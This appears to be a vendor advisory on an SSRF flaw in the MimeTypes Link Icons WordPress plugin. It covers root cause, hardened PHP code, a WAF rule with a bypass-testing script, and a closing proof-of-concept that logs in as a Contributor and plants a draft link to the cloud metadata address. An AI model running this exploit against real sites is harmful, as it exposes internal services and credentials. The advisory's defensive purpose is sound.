Atomic Edge analysis of CVE-2026-1313 (metadata-based):
The MimeTypes Link Icons plugin for WordPress, in versions up to and including 3.2.20, contains a server-side request forgery (SSRF) vulnerability. The flaw lets authenticated users with the Contributor role or higher make the web server issue outbound HTTP requests to URLs of their choosing. It is triggered when the plugin's 'Show file size' feature is enabled and an attacker places a crafted link in post content.
Atomic Edge research infers that the root cause is missing validation of user-supplied URLs before the plugin uses them as the target of an outbound HTTP request; the CWE-918 classification is consistent with this pattern. The vulnerability description states that the plugin makes outbound requests to user-controlled URLs. This most likely happens in a function hooked to `the_content` or a similar filter that scans the links in a post, takes each `href`, and retrieves the remote file's size, for example by reading the Content-Length header returned by `wp_remote_head()` or by opening the URL with `file_get_contents()`. Neither the scheme nor the network location of the target is restricted: `wp_remote_head()` performs no host validation unless the `reject_unsafe_urls` argument is set, and `file_get_contents()` additionally accepts non-HTTP stream wrappers such as `file://`.
An attacker exploits this by creating or editing a post that contains a malicious link whose `href` points to an internal service or otherwise restricted URL, such as `http://169.254.169.254/latest/meta-data/` for the AWS instance metadata service. When the post is rendered, viewed or previewed, the plugin's 'Show file size' functionality tries to fetch the size of the linked file, so the request originates from the web server itself and reaches addresses that are not routable from the attacker's network. The Contributor role, which can create and edit its own unpublished posts and preview them, is sufficient; the post never has to be published.
Remediation requires strict validation of every URL used for an outbound request: accept only the `http` and `https` schemes, resolve the host name and refuse loopback, link-local (including 169.254.0.0/16), private and other reserved address ranges for both IPv4 and IPv6, and apply the same check to any redirect target. In WordPress the `wp_safe_remote_*` family of functions (equivalently, passing `reject_unsafe_urls => true` to `wp_remote_head()`) provides a first layer of this validation and should replace bare `wp_remote_head()` or `file_get_contents()` calls. A user-configurable allowlist of permitted hosts, or a network-level egress allowlist for the web server, narrows the exposure further. The plugin should also enforce proper capability checks, although the description confirms that the attacker already needs Contributor access, a non-trivial privilege, so the fix must treat link authors as untrusted rather than rely on role gating.
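The inferred vulnerable pattern next to a hardened replacement, as an added example that is not the plugin's code: the `mtli_` function names and the way the size lookup is called are assumptions, while `wp_parse_url()`, `wp_safe_remote_head()`, `wp_remote_retrieve_response_code()` and `wp_remote_retrieve_header()` are standard WordPress HTTP API functions and the address-range checks use PHP's own `filter_var()` flags.

```php
<?php
// Added example, not code from the MimeTypes Link Icons plugin. The mtli_* names are
// assumptions; the WordPress functions used are the standard HTTP API.

// --- Inferred vulnerable pattern: the href is handed straight to the HTTP client. ---
function mtli_vulnerable_file_size( $url ) {
    $response = wp_remote_head( $url );   // any scheme, any host, any address
    if ( is_wp_error( $response ) ) {
        return null;
    }
    return (int) wp_remote_retrieve_header( $response, 'content-length' );
}

// --- Hardened: allowlist the scheme, resolve the host, refuse non-public addresses. ---
function mtli_is_public_http_url( $url ) {
    $parts = wp_parse_url( $url );
    if ( ! is_array( $parts ) || empty( $parts['host'] ) ) {
        return false;
    }
    if ( ! in_array( strtolower( $parts['scheme'] ?? '' ), array( 'http', 'https' ), true ) ) {
        return false;                     // rejects file://, gopher://, php://, data: ...
    }
    if ( isset( $parts['user'] ) || isset( $parts['pass'] ) ) {
        return false;                     // no credentials in outbound URLs
    }
    $host = trim( $parts['host'], '[].' ); // parse_url() keeps the brackets of IPv6 literals

    // Collect every address the name resolves to; a literal IP is used as-is.
    $addresses = filter_var( $host, FILTER_VALIDATE_IP ) ? array( $host ) : array();
    if ( ! $addresses ) {
        foreach ( (array) @dns_get_record( $host, DNS_A | DNS_AAAA ) as $record ) {
            $addresses[] = $record['ip'] ?? $record['ipv6'] ?? '';
        }
    }
    if ( ! $addresses ) {
        return false;                     // unresolvable name
    }
    // Every address must be public: FILTER_FLAG_NO_PRIV_RANGE covers 10/8, 172.16/12,
    // 192.168/16 and fc00::/7; FILTER_FLAG_NO_RES_RANGE covers 127/8, 0/8, 169.254/16,
    // 240/4, ::1 and fe80::/10. One private answer among several is enough to refuse.
    foreach ( $addresses as $ip ) {
        if ( false === filter_var( $ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE ) ) {
            return false;
        }
    }
    return true;
}

function mtli_safe_file_size( $url ) {
    if ( ! mtli_is_public_http_url( $url ) ) {
        return null;
    }
    // wp_safe_remote_head() sets reject_unsafe_urls, so WordPress' own wp_http_validate_url()
    // runs as a second layer. redirection => 0 closes the open-redirect bypass for a HEAD.
    $response = wp_safe_remote_head( $url, array( 'timeout' => 5, 'redirection' => 0 ) );
    if ( is_wp_error( $response ) || 200 !== wp_remote_retrieve_response_code( $response ) ) {
        return null;
    }
    $length = wp_remote_retrieve_header( $response, 'content-length' );
    return '' === $length ? null : (int) $length;
}
```

The pre-check resolves the name itself rather than relying on WordPress alone because `wp_http_validate_url()` only looks at the first IPv4 answer; verify against your WordPress version whether it also covers 169.254.0.0/16 and IPv6 before dropping the local check. Two caveats remain for a `the_content` hook: the resolution here and the one the HTTP client performs are separate lookups, so a DNS-rebinding host can still answer differently between them (pin the result or resolve inside the transport if that matters), and the lookup should be cached per URL (for example in a transient) so that rendering a post does not trigger a fresh outbound request on every page view.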
Successful exploitation enables attackers to probe and interact with internal services unreachable from the external network. This can lead to sensitive information disclosure from cloud metadata services, internal APIs, or file systems. Attackers could also leverage the vulnerable server as a proxy to attack other internal systems, potentially leading to lateral movement. The CVSS vector scores the impact with high Confidentiality, Integrity, and Availability impacts due to the scope change (S:C), reflecting the risk to backend systems.
Below is our ModSecurity-compatible rule to protect against this particular CVE. It is a signature for literal loopback, link-local and RFC 1918 address forms in submitted link targets and complements, rather than replaces, the server-side fix.
# Atomic Edge WAF Rule - CVE-2026-1313 (metadata-based)
# This rule blocks attempts to exploit the SSRF via post content submission.
# It targets the WordPress post creation/editing endpoints where malicious links can be
# injected: the classic editor (post.php, post-new.php), admin-ajax.php, and the REST API
# route the block editor saves through (/wp-json/wp/v2/posts). REST requests carry a JSON
# body, so the JSON request body processor must be enabled for ARGS:content to be populated.
# Only dotted-decimal and "localhost" forms are matched; decimal, hexadecimal or IPv6
# literals and attacker-controlled host names resolving to internal addresses are not.
SecRule REQUEST_URI "@rx ^/(?:wp-admin/(?:post\.php|post-new\.php|admin-ajax\.php)|wp-json/wp/v2/posts)" \
    "id:20261313,phase:2,deny,status:403,chain,msg:'CVE-2026-1313: MimeTypes Link Icons SSRF via crafted post content',severity:'CRITICAL',tag:'CVE-2026-1313',tag:'WordPress',tag:'Plugin/MimeTypes-Link-Icons',tag:'attack/ssrf'"
    SecRule REQUEST_COOKIES:/wordpress_logged_in_[a-f0-9]+/ "@rx .+" "chain"
    SecRule ARGS:content "@rx href\s*=\s*['\"]?\s*https?://(?:127\.0\.0\.1|localhost|169\.254\.169\.254|10\.|172\.(?:1[6-9]|2[0-9]|3[01])\.|192\.168\.)" \
        "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,setvar:'tx.cve_2026_1313_score=+1',setvar:'tx.anomaly_score=+%{tx.critical_anomaly_score}'"
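As an added example that is not part of the rule set above, the PHP script below runs the rule's link-target pattern, with the same decode-and-lowercase transformations, over a few constructed request bodies (made up for this page) to show which link forms the signature catches and which reach the plugin untouched.

```php
<?php
// Added example: exercises the WAF rule's pattern locally. The request bodies are
// constructed for illustration; the pattern is the one from the rule, in PCRE form.
const MTLI_WAF_PATTERN = '~href\s*=\s*[\'"]?\s*https?://(?:127\.0\.0\.1|localhost|169\.254\.169\.254|10\.|172\.(?:1[6-9]|2[0-9]|3[01])\.|192\.168\.)~';

// Approximates t:urlDecodeUni, t:htmlEntityDecode and t:lowercase on the whole body;
// ModSecurity applies them to the parsed "content" argument, which is equivalent here.
function mtli_waf_matches( string $body ): bool {
    $decoded = strtolower( html_entity_decode( rawurldecode( $body ), ENT_QUOTES ) );
    return 1 === preg_match( MTLI_WAF_PATTERN, $decoded );
}

// Returns label => bool so the whole table can be inspected in one call.
function mtli_waf_run_samples(): array {
    $samples = array(
        'literal metadata IP'       => 'content=<a href="http://169.254.169.254/latest/meta-data/">x</a>',
        'url-encoded loopback'      => 'content=%3Ca%20href%3D%22http%3A%2F%2F127.0.0.1%2F%22%3Ex%3C%2Fa%3E',
        'entity-encoded quote'      => 'content=<a href=&quot;http://192.168.1.10/&quot;>x</a>',
        'decimal IP, same host'     => 'content=<a href="http://2852039166/">x</a>',      // 169.254.169.254
        'hex IP, same host'         => 'content=<a href="http://0xa9fea9fe/">x</a>',      // 169.254.169.254
        'IPv6 loopback literal'     => 'content=<a href="http://[::1]/">x</a>',
        'name resolving internally' => 'content=<a href="http://internal.example.test/">x</a>',
    );
    $results = array();
    foreach ( $samples as $label => $body ) {
        $results[ $label ] = mtli_waf_matches( $body );
    }
    return $results;
}

foreach ( mtli_waf_run_samples() as $label => $blocked ) {
    printf( "%-28s %s\n", $label, $blocked ? 'BLOCKED' : 'passed' );
}
```

The first three rows are caught because the transformations normalise encoding and quoting before the match; the remaining rows are not, even though libcurl and PHP's stream wrappers accept decimal and hexadecimal IPv4 literals and an IPv6 loopback address, and a host name the attacker controls can resolve to any internal address. That gap is why the rule should be treated as a detection aid on top of the server-side validation, not as the fix.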
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-1313 - MimeTypes Link Icons <= 3.2.20 - Authenticated (Contributor+) Server-Side Request Forgery via Crafted Links in Post Content
/*
 * This PoC simulates an attacker with Contributor credentials creating a draft post whose
 * content carries a link to an internal address, then previewing the draft so that the
 * plugin's 'Show file size' feature (assumed enabled) makes the outbound request.
 * The draft is created through the WordPress REST API (/wp-json/wp/v2/posts) with a REST
 * nonce obtained from admin-ajax.php?action=rest-nonce, the same endpoint the editor uses
 * to refresh its nonce, so the flow works with both the classic and the block editor.
 */
$target_url       = 'http://wordpress-site.local';                 // CHANGE THIS to the target WordPress site URL
$username         = 'contributor_user';                            // CHANGE THIS to a valid Contributor username
$password         = 'contributor_pass';                            // CHANGE THIS to the user's password
$internal_service = 'http://169.254.169.254/latest/meta-data/';    // Example internal target

$cookie_jar = tempnam( sys_get_temp_dir(), 'wpssrf' );
$ch = curl_init();
curl_setopt_array( $ch, [
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_FOLLOWLOCATION => true,
    CURLOPT_COOKIEJAR      => $cookie_jar,
    CURLOPT_COOKIEFILE     => $cookie_jar,
] );

// Helper: apply per-request options, run the request and stop on transport errors.
function do_request( $ch, array $opts ) {
    curl_setopt_array( $ch, $opts );
    $body = curl_exec( $ch );
    if ( false === $body ) {
        fwrite( STDERR, 'curl error: ' . curl_error( $ch ) . "\n" );
        exit( 1 );
    }
    return $body;
}

// Step 1: Authenticate against wp-login.php; the session cookie lands in the cookie jar.
do_request( $ch, [
    CURLOPT_URL        => $target_url . '/wp-login.php',
    CURLOPT_POST       => true,
    CURLOPT_POSTFIELDS => http_build_query( [
        'log'         => $username,
        'pwd'         => $password,
        'wp-submit'   => 'Log In',
        'redirect_to' => $target_url . '/wp-admin/',
        'testcookie'  => '1',
    ] ),
    CURLOPT_HTTPHEADER => [ 'Content-Type: application/x-www-form-urlencoded' ],
] );

// Step 2: Obtain a REST API nonce. WordPress returns a bare 10-character hex nonce to any
// logged-in user; anything else means the login failed.
$nonce = trim( do_request( $ch, [
    CURLOPT_URL        => $target_url . '/wp-admin/admin-ajax.php?action=rest-nonce',
    CURLOPT_HTTPGET    => true,
    CURLOPT_HTTPHEADER => [],
] ) );
if ( ! preg_match( '/^[a-f0-9]{10}$/', $nonce ) ) {
    fwrite( STDERR, 'Login or nonce retrieval failed (got: ' . substr( $nonce, 0, 80 ) . ")\n" );
    exit( 1 );
}

// Step 3: Create a draft post containing the malicious link. Contributors may create
// drafts (edit_posts) but not publish, which is all the attack needs.
$post_json = do_request( $ch, [
    CURLOPT_URL        => $target_url . '/wp-json/wp/v2/posts',
    CURLOPT_POST       => true,
    CURLOPT_POSTFIELDS => json_encode( [
        'title'   => 'Test Post with SSRF Link',
        'content' => '<a href="' . $internal_service . '">Malicious Link</a>', // Crafted link triggers SSRF
        'status'  => 'draft',
    ] ),
    CURLOPT_HTTPHEADER => [
        'Content-Type: application/json',
        'X-WP-Nonce: ' . $nonce,
    ],
] );
$post = json_decode( $post_json, true );
if ( empty( $post['id'] ) ) {
    fwrite( STDERR, 'Post creation failed: ' . substr( $post_json, 0, 200 ) . "\n" );
    exit( 1 );
}
$post_id = (int) $post['id'];
echo "Created draft post ID {$post_id}\n";

// Step 4: Trigger the SSRF by previewing the draft as its author. Rendering the content
// runs the plugin's link processing, and the server (not this client) contacts the target.
do_request( $ch, [
    CURLOPT_URL        => $target_url . '/?p=' . $post_id . '&preview=true',
    CURLOPT_HTTPGET    => true,
    CURLOPT_HTTPHEADER => [],
] );
echo "If the plugin's 'Show file size' option is enabled, the server should have made a request to: {$internal_service}\n";
echo "Check server logs or network egress for the outgoing request.\n";

curl_close( $ch );
unlink( $cookie_jar );